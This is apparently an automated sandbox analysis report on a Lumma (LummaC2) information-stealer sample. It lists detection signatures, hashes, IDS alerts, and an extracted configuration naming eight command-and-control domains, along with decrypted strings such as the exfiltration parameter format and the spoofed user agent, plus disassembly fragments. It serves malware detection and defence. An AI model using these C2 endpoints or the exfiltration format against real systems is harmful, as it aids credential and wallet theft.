Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SkaKk8Z1J0.exe

Overview

General Information

Sample name:SkaKk8Z1J0.exe
renamed because original name is a hash value
Original sample name:6997ff1992058c43f1355563c6a5a7af.exe
Analysis ID:1576507
MD5:6997ff1992058c43f1355563c6a5a7af
SHA1:95c9fcfa6ac631f401f2692ab9ab36a91f58d5b3
SHA256:0e29ab34ff11281fd5c6544fbf9f4685a29a1bfe4e5e422e0a1b39f03f5534fe
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SkaKk8Z1J0.exe (PID: 4692 cmdline: "C:\Users\user\Desktop\SkaKk8Z1J0.exe" MD5: 6997FF1992058C43F1355563C6A5A7AF)
    • WerFault.exe (PID: 7524 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1004 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["debonairnukk.xyz", "awake-weaves.cyou", "sordid-snaked.cyou", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "wrathful-jammy.cyou", "effecterectz.xyz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000003.1261325355.0000000000790000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SkaKk8Z1J0.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0.2.SkaKk8Z1J0.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.3.SkaKk8Z1J0.exe.790000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.3.SkaKk8Z1J0.exe.790000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:10.881518+010020283713Unknown Traffic192.168.2.74969945.77.249.79443TCP
                  2024-12-17T08:14:13.178343+010020283713Unknown Traffic192.168.2.749700104.131.68.180443TCP
                  2024-12-17T08:14:16.130886+010020283713Unknown Traffic192.168.2.749701104.121.10.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:11.788645+010020546531A Network Trojan was detected192.168.2.74969945.77.249.79443TCP
                  2024-12-17T08:14:13.593907+010020546531A Network Trojan was detected192.168.2.749700104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:11.788645+010020498361A Network Trojan was detected192.168.2.74969945.77.249.79443TCP
                  2024-12-17T08:14:13.593907+010020498361A Network Trojan was detected192.168.2.749700104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:13.178343+010020582151Domain Observed Used for C2 Detected192.168.2.749700104.131.68.180443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:10.881518+010020582231Domain Observed Used for C2 Detected192.168.2.74969945.77.249.79443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:14.211093+010020582101Domain Observed Used for C2 Detected192.168.2.7654421.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:11.794067+010020582141Domain Observed Used for C2 Detected192.168.2.7612381.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:13.927522+010020582161Domain Observed Used for C2 Detected192.168.2.7542531.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:13.785650+010020582181Domain Observed Used for C2 Detected192.168.2.7583491.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:13.598641+010020582201Domain Observed Used for C2 Detected192.168.2.7620041.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:08.865340+010020582221Domain Observed Used for C2 Detected192.168.2.7628191.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:08.724566+010020582261Domain Observed Used for C2 Detected192.168.2.7573941.1.1.153UDP
                  2024-12-17T08:14:14.354174+010020582261Domain Observed Used for C2 Detected192.168.2.7575061.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:14.069775+010020582361Domain Observed Used for C2 Detected192.168.2.7597061.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:10.885191+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.749699TCP
                  2024-12-17T08:14:13.234231+010028225211Domain Observed Used for C2 Detected104.131.68.180443192.168.2.749700TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:16.961417+010028586661Domain Observed Used for C2 Detected192.168.2.749701104.121.10.34443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: SkaKk8Z1J0.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://effecterectz.xyz/tXAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz:443/api0uAvira URL Cloud: Label: malware
                  Source: https://awake-weaves.cyou/apiUZAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/zAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/4Avira URL Cloud: Label: malware
                  Source: https://immureprech.biz/piAvira URL Cloud: Label: malware
                  Source: https://effecterectz.xyz/api2Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0.2.SkaKk8Z1J0.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "awake-weaves.cyou", "sordid-snaked.cyou", "immureprech.biz", "deafeninggeh.biz", "diffuculttan.xyz", "wrathful-jammy.cyou", "effecterectz.xyz"], "Build id": "4h5VfH--"}
                  Multi AV Scanner detection for submitted file
                  Source: SkaKk8Z1J0.exeReversingLabs: Detection: 39%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: SkaKk8Z1J0.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: effecterectz.xyz
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: immureprech.biz
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeUnpacked PE file: 0.2.SkaKk8Z1J0.exe.400000.0.unpack
                  Source: SkaKk8Z1J0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.7:49701 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0043CD60
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, edx0_2_0040BDC9
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp al, 2Eh0_2_00426054
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_00426054
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B068
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B068
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0040E83B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0040A940
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, ecx0_2_0040A940
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0040C917
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp dword ptr [00443D10h]0_2_0042891F
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp ecx0_2_0043C1F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00425990
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, di0_2_00425990
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B195
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0043B9A1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_004369A0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0041E9B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004299B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_0042526A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebx, edi0_2_0041D270
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov esi, eax0_2_00423A34
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0043D2F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0043D2F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp ecx0_2_0043C280
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_00415298
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415298
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0043AAB2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_004252BA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_004252BA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov eax, ebx0_2_0041CB05
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0043CB20
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, eax0_2_00427326
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_004143C2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]0_2_004143C2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042A3D0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042C45C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00436C00
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4FC
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042B4FC
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_00418578
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, eax0_2_0042750D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_00421D10
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0040DD25
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_00417582
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00427DA2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_004205B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C64A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042AE48
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_00426E50
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042B4F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042AE24
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00433630
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C6E4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00425E90
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0043CE90
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004166A0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041BEA0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0042ADF4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov eax, edx0_2_0041C6BB
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_0043BF40
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00415F66
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0043A777
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00409700
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00409700
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00409700
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C726
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C735
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0040CFF3
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0040CFF3
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041DF80
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, edx0_2_0074C030
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0077D0F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_007660F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_007670E4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076B0AF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076B08B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076B05B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0075E1E7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_0077C268
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0074D25A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0074D25A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0077B2C4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0077B2C4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0077B2CF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0077B2CF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0077B2C2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0077B2C2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0077B3FC
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp al, 2Eh0_2_007663B6
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebx, edi0_2_0075D4D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_007654D1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0077D557
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0077D557
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00756544
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_0075554C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0075C528
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_0076552B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_007655B3
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_0076559D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0076A637
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076C6C3
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0076B763
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076B763
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp eax0_2_00766739
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_007577E9
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_007587DF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, eax0_2_00767797
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then jmp ecx0_2_0077C79B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0076B75E
